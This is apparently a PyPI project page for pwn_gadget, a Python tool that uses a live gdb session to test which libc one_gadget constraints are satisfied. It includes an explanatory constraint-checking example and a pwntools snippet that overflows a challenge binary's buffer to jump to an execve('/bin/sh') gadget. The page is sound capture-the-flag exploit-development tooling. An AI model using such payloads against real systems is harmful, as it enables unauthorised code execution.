
Find satisfiable one gadgets from a running gdb instance

Project description

pwn_gadget

Check for satisfied one gadget constraints using the state of a running gdb instance

Requires the one_gadget tool to be installed and on your PATH; pwn_gadget invokes it via subprocess to collect the gadgets and their constraints.

How does this work?

1. pwn_gadget runs one_gadget on the target libc and parses each gadget's constraints (for example [rsp+0x40] == NULL, or [r15] == NULL || r15 == NULL) in Python into expressions that a gdb print command can evaluate.

2. Using the gdb Python API, obtained through pwntools' gdb module (gdb.attach(..., api=True)), it evaluates those expressions against the live registers and memory of the stopped process.

3. It applies the boolean operations from the one_gadget constraints (the || alternatives within a line, and the implicit AND across a gadget's lines) to the values gdb returned.

4. It searches for a gadget for which every boolean operation returned True and returns that gadget's offset into libc, or None if no gadget is satisfied.

Whether or not a satisfiable gadget is found, color-coded information on the succeeding and failing constraints of each gadget is printed, so you can see which condition rules a gadget out at the chosen breakpoint.
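The four steps above, as an added example that is not pwn_gadget's own code: it parses one_gadget's text output, translates each constraint atom into a C expression that gdb can print (the $reg and cast-and-dereference form is my own translation; the exact format pwn_gadget generates is not shown on this page), evaluates it, and ORs the alternatives within a line while ANDing the lines of a gadget. The evaluator interface is assumed: GdbEvaluator wraps the parse_and_eval() call of the gdb API object pwntools returns from gdb.attach(..., api=True), and FakeEvaluator substitutes a constructed register file and memory image so the example runs offline. The sample one_gadget output is constructed in the tool's output format and does not describe a real libc build.

```python
import re
from typing import Dict, List, NamedTuple, Optional, Tuple

# Constructed sample in one_gadget's output format; offsets and constraints are illustrative only.
SAMPLE_ONE_GADGET_OUTPUT = """\
0xe3afe execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b04 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL || {[rsp+0x40], [rsp+0x48], [rsp+0x50], ...} is a valid argv
"""

CTYPES = {"u8": "unsigned char", "u16": "unsigned short", "u32": "unsigned int", "u64": "unsigned long"}
# Atom forms handled: "reg == X", "[reg(+/-off)] == X", "(u16)[reg] == X", with X = NULL or a number.
ATOM_RE = re.compile(r"^(?:\((?P<width>u8|u16|u32|u64)\))?"
                     r"(?:\[(?P<base>\w+)(?:(?P<sign>[+-])(?P<off>0x[0-9a-fA-F]+|\d+))?\]|(?P<reg>\w+))"
                     r" == (?P<rhs>NULL|0x[0-9a-fA-F]+|\d+)$")

class Gadget(NamedTuple):
    offset: int             # offset into libc
    desc: str               # e.g. execve("/bin/sh", r15, r12)
    constraints: List[str]  # one entry per line; "||" alternatives stay inside the string

def parse_one_gadget(text: str) -> List[Gadget]:
    """Split one_gadget's text output into gadgets and their constraint lines."""
    gadgets = []
    for block in text.strip().split("\n\n"):
        lines = [l.strip() for l in block.splitlines() if l.strip()]
        off, desc = lines[0].split(" ", 1)
        gadgets.append(Gadget(int(off, 16), desc, [l for l in lines[1:] if l != "constraints:"]))
    return gadgets

def to_gdb_expr(atom: str) -> Optional[str]:
    """Constraint atom -> C expression gdb can print; None for unsupported atoms (fail closed)."""
    m = ATOM_RE.match(atom.strip())
    if not m:
        return None  # e.g. "writable: rbp", "... is a valid argv", "rsp & 0xf == 0"
    rhs = "0" if m["rhs"] == "NULL" else m["rhs"]
    if m["reg"]:
        return f"${m['reg']} == {rhs}"
    addr = f"${m['base']}" + (f"{m['sign']}{m['off']}" if m["off"] else "")
    return f"*({CTYPES[m['width'] or 'u64']} *)({addr}) == {rhs}"

class GdbEvaluator:
    """Wraps the gdb API object from pwntools' gdb.attach(..., api=True); assumed interface, not run offline."""
    def __init__(self, gdb_api):
        self.gdb = gdb_api
    def evaluate(self, expr: str) -> bool:
        try:
            return bool(int(self.gdb.parse_and_eval(expr)))
        except Exception:  # unmapped memory or a bad expression: fail closed
            return False

class FakeEvaluator:
    """Offline stand-in: register file plus sparse little-endian memory, same fail-closed rule for unmapped reads."""
    DEREF_RE = re.compile(r"^\*\((unsigned \w+) \*\)\(\$(\w+)(?:([+-])(\w+))?\) == (\w+)$")
    SIZES = {"unsigned char": 1, "unsigned short": 2, "unsigned int": 4, "unsigned long": 8}
    def __init__(self, regs: Dict[str, int], mem: Dict[int, bytes]):
        self.regs = regs
        self.mem = {base + i: b for base, data in mem.items() for i, b in enumerate(data)}
    def evaluate(self, expr: str) -> bool:
        m = re.match(r"^\$(\w+) == (\w+)$", expr)
        if m:
            return m[1] in self.regs and self.regs[m[1]] == int(m[2], 0)
        m = self.DEREF_RE.match(expr)
        if not m or m[2] not in self.regs:
            return False
        off = int(m[4], 0) * (-1 if m[3] == "-" else 1) if m[4] else 0
        addr = (self.regs[m[2]] + off) & ((1 << 64) - 1)
        data = [self.mem.get(addr + i) for i in range(self.SIZES[m[1]])]
        return None not in data and int.from_bytes(bytes(data), "little") == int(m[5], 0)

def check_gadgets(gadgets: List[Gadget], ev) -> Dict[int, List[Tuple[str, bool]]]:
    """A constraint line holds if any "||" alternative holds; a gadget's lines are implicitly ANDed."""
    return {g.offset: [(line, any(e is not None and ev.evaluate(e)
                                  for e in map(to_gdb_expr, line.split("||"))))
                       for line in g.constraints] for g in gadgets}

def find_gadget(gadgets: List[Gadget], ev) -> Optional[int]:
    """Libc offset of the first gadget whose constraints all hold, else None."""
    for off, results in check_gadgets(gadgets, ev).items():
        if all(ok for _, ok in results):
            return off
    return None

if __name__ == "__main__":
    # Constructed process state: r15 is NULL, r12 points at non-NULL bytes, rdx points at a NULL qword.
    state = FakeEvaluator({"r15": 0, "r12": 0x7ffd0000, "rdx": 0x1000, "rsp": 0x7ffd1000},
                          {0x7ffd0000: b"\x41" * 8, 0x1000: b"\x00" * 8, 0x7ffd1040: b"\x01" * 8})
    gadgets = parse_one_gadget(SAMPLE_ONE_GADGET_OUTPUT)
    for off, results in check_gadgets(gadgets, state).items():
        print(hex(off), *(f"  [{'OK ' if ok else 'BAD'}] {c}" for c, ok in results), sep="\n")
    print("satisfied gadget:", find_gadget(gadgets, state))  # prints 932609 (0xe3b01)
```

Two properties worth keeping in a real run: atoms the translator does not understand (writable: ..., "... is a valid argv", stack-alignment checks) count as failing rather than passing, so a gadget is never reported satisfied because a constraint was skipped; and an unreadable address makes the atom false, which is the behaviour you want for [r15] == NULL when r15 is itself NULL. Because pwntools spawns the target and gdb attaches afterwards, the inferior's environment, and with it the stack layout that [rsp+0x40]-style constraints depend on, is the same as in an undebugged run; starting the target under gdb instead adds LINES and COLUMNS to its environment and shifts those stack offsets.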

Usage

from pwn import *
import pwn_gadget

p = process("chal")
libc = p.libc

# attach gdb (api=True returns a (pid, gdb) pair) and break where control will be
# redirected to the gadget, so the registers and stack that get checked are the ones the gadget will see
_, gdb_api = gdb.attach(p, gdbscript="b *(vuln+180)", api=True)
# look for a gadget whose one_gadget constraints hold in the stopped process;
# find_gadget returns the gadget's offset into libc, or None if no gadget is satisfied
gadget = pwn_gadget.find_gadget(gdb_api, libc.path)

# use found address in payload
payload = b"A"*32 + p64(gadget+libc.address)
p.sendline(payload)

p.interactive()

Example Output

Success: (screenshot) successful discovery of a satisfied one gadget

Failure: (screenshot) failed discovery of a satisfied one gadget, with the failing constraints of each gadget shown

Download files

Source Distribution

pwn_gadget-0.0.1.tar.gz (4.5 kB)

  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.1 CPython/3.10.4

Hashes for pwn_gadget-0.0.1.tar.gz
Algorithm   Hash digest
SHA256      42a80aba9f2e773c1d6860708d812c9f3bdc636c5d3a6878b53c9cb9a5a4afc4
MD5         c24ce0780edb3ca573d10176daa76e16
BLAKE2b-256 9555ff0310a3079a3d1dc7f62521f1b8080f56392842e05e5989c213f7c2e3c6

Built Distribution

pwn_gadget-0.0.1-py3-none-any.whl (5.6 kB)

  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.1 CPython/3.10.4

Hashes for pwn_gadget-0.0.1-py3-none-any.whl
Algorithm   Hash digest
SHA256      f00794c55878edc93e8052391a0dec93f63b4d6cf7ef015fc938007d805600ee
MD5         545fc144bb1225b8f9abdce73f5b2216
BLAKE2b-256 ce5a160b1d3b57daeada69712b7c337217c2423dfcbe9f28bde2d04fa21bf33c
